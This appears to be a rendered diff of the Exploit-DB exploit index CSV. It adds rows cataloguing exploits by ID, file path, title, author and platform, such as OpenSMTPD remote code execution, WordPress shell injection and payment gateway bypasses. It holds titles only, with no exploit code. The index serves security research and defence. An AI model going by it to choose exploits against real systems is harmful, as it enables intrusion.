48137,exploits/windows/dos/48137.py,"Core FTP LE 2.2 - Denial of Service (PoC)",2020-02-26,"Ismael Nava",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -18015,6 +18016,8 @@ id,file,description,date,author,type,platform,port
48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows, 48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows,
48092,exploits/windows/remote/48092.rb,"Anviz CrossChex - Buffer Overflow (Metasploit)",2020-02-17,Metasploit,remote,windows, 48092,exploits/windows/remote/48092.rb,"Anviz CrossChex - Buffer Overflow (Metasploit)",2020-02-17,Metasploit,remote,windows,
48130,exploits/linux/remote/48130.rb,"Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)",2020-02-24,Metasploit,remote,linux, 48130,exploits/linux/remote/48130.rb,"Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)",2020-02-24,Metasploit,remote,linux,
48139,exploits/linux/remote/48139.c,"OpenSMTPD 6.6.3 - Arbitrary File Read",2020-02-26,"Qualys Corporation",remote,linux,
48140,exploits/openbsd/remote/48140.c,"OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution",2020-02-26,"Qualys Corporation",remote,openbsd,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42387,6 +42390,7 @@ id,file,description,date,author,type,platform,port
48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware, 48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware,
48099,exploits/php/webapps/48099.txt,"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)",2020-02-20,indoushka,webapps,php, 48099,exploits/php/webapps/48099.txt,"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)",2020-02-20,indoushka,webapps,php,
48105,exploits/hardware/webapps/48105.txt,"Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting",2020-02-24,"Scott Goodwin",webapps,hardware, 48105,exploits/hardware/webapps/48105.txt,"Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting",2020-02-24,"Scott Goodwin",webapps,hardware,
48106,exploits/php/webapps/48106.txt,"GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection",2020-02-24,emaragkos,webapps,php,
48107,exploits/hardware/webapps/48107.pl,"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware, 48107,exploits/hardware/webapps/48107.pl,"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
48108,exploits/multiple/webapps/48108.txt,"Real Web Pentesting Tutorial Step by Step - [Persian]",2020-02-24,"Meisam Monsef",webapps,multiple, 48108,exploits/multiple/webapps/48108.txt,"Real Web Pentesting Tutorial Step by Step - [Persian]",2020-02-24,"Meisam Monsef",webapps,multiple,
48109,exploits/php/webapps/48109.txt,"AMSS++ v 4.31 - 'id' SQL Injection",2020-02-24,indoushka,webapps,php, 48109,exploits/php/webapps/48109.txt,"AMSS++ v 4.31 - 'id' SQL Injection",2020-02-24,indoushka,webapps,php,
@ -42404,3 +42408,4 @@ id,file,description,date,author,type,platform,port
48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php, 48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,
48134,exploits/php/webapps/48134.php,"WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass",2020-02-25,GeekHack,webapps,php, 48134,exploits/php/webapps/48134.php,"WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass",2020-02-25,GeekHack,webapps,php,
48135,exploits/php/webapps/48135.php,"Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass",2020-02-25,GeekHack,webapps,php, 48135,exploits/php/webapps/48135.php,"Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass",2020-02-25,GeekHack,webapps,php,
48138,exploits/php/webapps/48138.txt,"PhpIX 2012 Professional - 'id' SQL Injection",2020-02-26,indoushka,webapps,php,

Can't render this file because it is too large.